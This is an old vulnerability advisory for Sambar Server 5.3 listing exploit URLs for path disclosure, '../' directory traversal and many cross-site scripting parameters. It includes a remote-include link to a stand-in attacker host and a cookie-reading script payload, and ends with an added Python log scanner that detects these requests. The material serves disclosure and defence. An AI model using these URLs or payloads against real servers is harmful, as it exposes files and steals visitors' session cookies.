SCSA012.txt

29 Mar 2003 | Reported by Gregory Le Bras | Type: packetstorm | Source: packetstormsecurity.com

Sambar Server vulnerable to Path Disclosure, affecting versions 5.3 and prior.

`________________________________________________________________________  
  
Security Corporation Security Advisory [SCSA-012]  
________________________________________________________________________  
  
PROGRAM: Sambar Server  
HOMEPAGE: http://www.sambar.com/  
VULNERABLE VERSIONS: 5.3 and prior  
________________________________________________________________________  
  
  
DESCRIPTION  
________________________________________________________________________  
  
"Sambar Server is the new standard in high performance multi-functional  
servers with features rivaling other commercial products selling  
separately for several hundreds of dollars. It's Winsock2 compliant Win32  
integration functions on Windows 95, Windows 98, Windows NT, Win2000,  
and XP as a service or as an application."  
(direct quote from http://sambar.jalyn.net)  
  
  
DETAILS & EXPLOITS  
________________________________________________________________________  
  
  
¤ Path Disclosure :  
  
Sambar's default installation of the CGI bin directory contains  
a testcgi.exe and an environ.pl that allow remote users to view  
information regarding the operating system and the  
web server's directory.  
  
These vulnerabilities can be triggered by a remote user submitting  
a specially crafted HTTP request.  
  
  
- Exploits :  
  
http://[target]/cgi-bin/environ.pl  
  
http://[target]/cgi-bin/testcgi.exe  
  
  
Will produce the following output:  
  
- environ.pl :  
--------------  
  
Sambar Server CGI Environment Variables  
GATEWAY_INTERFACE: CGI/1.1  
PATH_INFO:  
PATH_TRANSLATED: C:/sambar53/cgi-bin/environ.pl  
QUERY_STRING:  
REMOTE_ADDR: 127.0.0.1  
REMOTE_HOST:  
REMOTE_USER:  
REQUEST_METHOD: GET  
DOCUMENT_NAME: environ.pl  
DOCUMENT_URI: /cgi-bin/environ.pl  
SCRIPT_NAME: /cgi-bin/environ.pl  
SCRIPT_FILENAME: C:/sambar53/cgi-bin/environ.pl  
SERVER_NAME: localhost  
SERVER_PORT: 80  
SERVER_PROTOCOL: HTTP/1.1  
SERVER_SOFTWARE: SAMBAR  
CONTENT_LENGTH: 0  
CONTENT:  
  
  
- testcgi.exe :  
---------------  
  
Test CGI ... Version 1.00 [ build date 8-03-97 ]  
  
QUERY_STRING  
PATH_INFO  
PATH_TRANSLATED C:/sambar53/cgi-bin/testcgi.exe  
SCRIPT_NAME /cgi-bin/testcgi.exe  
SCRIPT_FILENAME C:/sambar53/cgi-bin/testcgi.exe  
DOCUMENT_ROOT C:/sambar53/docs/  
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)  
REMOTE_ADDR 127.0.0.1  
REMOTE_HOST  
SERVER_NAME localhost  
SERVER_PROTOCOL HTTP/1.1  
SERVER_SOFTWARE SAMBAR  
CONTENT_TYPE  
  
----------------------------  
  
  
¤ Directory Disclosure :  
  
Other security vulnerabilities were found in Sambar which allow an  
attacker to reveal the content of the files and the directories  
on the web server, even if it should not be revealed.  
  
These vulnerabilities can be exploited simply by requesting a  
specially crafted URL that uses the iecreate.stm and ieedit.stm  
applications with a '../' appended.  
  
- Exploits :  
  
http://[target]/sysuser/docmgr/iecreate.stm?template=../  
  
http://[target]/sysuser/docmgr/ieedit.stm?url=../  
  
  
----------------------------  
  
  
¤ Cross Site Scripting :  
  
Many exploitable bugs were found in Sambar Server which cause script  
execution on the client's computer when a crafted URL is followed.  
  
This kind of attack, known as a "Cross-Site Scripting Vulnerability", is  
present in many sections of the web site; an attacker can input  
specially crafted links and/or other malicious scripts.  
  
- Exploits :  
  
http://[target]/netutils/ipdata.stm?ipaddr=[hostile_code]  
  
http://[target]/netutils/whodata.stm?sitename=[hostile_code]  
  
http://[target]/netutils/findata.stm?user=[hostile_code]  
  
http://[target]/netutils/findata.stm?host=[hostile_code]  
  
http://[target]/isapi/testisa.dll?check1=[hostile_code]  
  
http://[target]/cgi-bin/environ.pl?param1=[hostile_code]  
  
http://[target]/samples/search.dll?query=[hostile_code]&logic=AND  
  
http://[target]/wwwping/index.stm?wwwsite=[hostile_code]  
  
http://[target]/syshelp/stmex.stm?foo=[hostile_code]&bar=456  
  
http://[target]/syshelp/stmex.stm?foo=123&bar=[hostile_code]  
  
http://[target]/syshelp/cscript/showfunc.stm?func=[hostile_code]  
  
http://[target]/syshelp/cscript/showfncs.stm?pkg=[hostile_code]  
  
http://[target]/syshelp/cscript/showfnc.stm?pkg=[hostile_code]  
  
http://[target]/sysuser/docmgr/ieedit.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/ieedit.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/edit.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/edit.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/iecreate.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/create.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/info.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/info.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/ftp.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/htaccess.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/mkdir.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/rename.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/rename.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/search.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/search.stm?query=[hostile_code]  
  
http://[target]/sysuser/docmgr/sendmail.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/sendmail.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/template.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/update.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/update.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccheckin.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccheckin.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccreate.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/vccreate.stm?name=[hostile_code]  
  
http://[target]/sysuser/docmgr/vchist.stm?path=[hostile_code]  
  
http://[target]/sysuser/docmgr/vchist.stm?name=[hostile_code]  
  
http://[target]/cgi-bin/testcgi.exe?[hostile_code]  
  
  
- Another Cross Site Scripting issue can be exploited with a  
remote file that includes the hostile code, like this:  
  
http://[target]/sysuser/docmgr/ieedit.stm?url=http://[attacker]/hostile_file.htm  
  
  
The hostile code could be :  
  
[script]alert("Cookie="+document.cookie)[/script]  
  
(opens a window showing the visitor's cookie.)  
  
(replace [] with <>)  
  
  
SOLUTIONS  
________________________________________________________________________  
  
No solution for the moment.  
  
  
VENDOR STATUS  
________________________________________________________________________  
  
The vendor has reportedly been notified.  
  
  
LINKS  
________________________________________________________________________  
  
- http://www.security-corp.org/index.php?ink=4-15-1  
  
- French version:  
http://www.security-corporation.com/index.php?id=advisories&a=012-FR  
  
  
------------------------------------------------------------------------  
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corporation.com  
------------------------------------------------------------------------  
  
  
  
  
  
`
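
To check whether a server has received the kinds of request this advisory lists, the access log can be scanned for them. The Python below is an added example, not part of the original advisory: it assumes Common Log Format, and the log lines, finding labels and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Sample scripts the advisory reports as printing server paths.
INFO_LEAK_PATHS = {"/cgi-bin/environ.pl", "/cgi-bin/testcgi.exe"}
# docmgr pages and the parameter the advisory shows taking '../' or a remote URL.
DOCMGR_PARAMS = {"/sysuser/docmgr/iecreate.stm": "template",
                 "/sysuser/docmgr/ieedit.stm": "url"}
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|javascript:", re.I)
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [29/Mar/2003:10:00:01 +0000] "GET /cgi-bin/environ.pl HTTP/1.1" 200 612',
    '203.0.113.7 - - [29/Mar/2003:10:00:02 +0000] "GET /sysuser/docmgr/iecreate.stm?template=..%2F HTTP/1.1" 200 2048',
    '198.51.100.9 - - [29/Mar/2003:10:00:03 +0000] "GET /netutils/ipdata.stm?ipaddr=%3Cscript%3Ex%3C/script%3E HTTP/1.1" 200 900',
    '192.0.2.4 - - [29/Mar/2003:10:00:04 +0000] "GET /index.htm HTTP/1.1" 200 5120',
]

def _decode(value, rounds=3):
    # Undo nested percent-encoding so %252e%252e%252f is still seen as ../
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (client, path, sorted findings) for one log line, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    path = unquote(parts.path).lower()  # Windows paths are case-insensitive
    findings = set()
    if path in INFO_LEAK_PATHS:
        findings.add("path-disclosure-script")
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = _decode(value)
        if DOCMGR_PARAMS.get(path) == name:
            if "../" in value.replace("\\", "/"):
                findings.add("docmgr-traversal")
            if re.match(r"(?i)https?://", value):
                findings.add("docmgr-remote-include")
    # Check the whole query too: testcgi.exe?<payload> has no name=value pair.
    if MARKUP.search(_decode(parts.query)):
        findings.add("reflected-markup")
    return (client, path, sorted(findings)) if findings else None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]
```

Any hit on the two CGI sample scripts is worth acting on even without a payload, since the advisory shows them printing `DOCUMENT_ROOT` and `SCRIPT_FILENAME` to any visitor.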
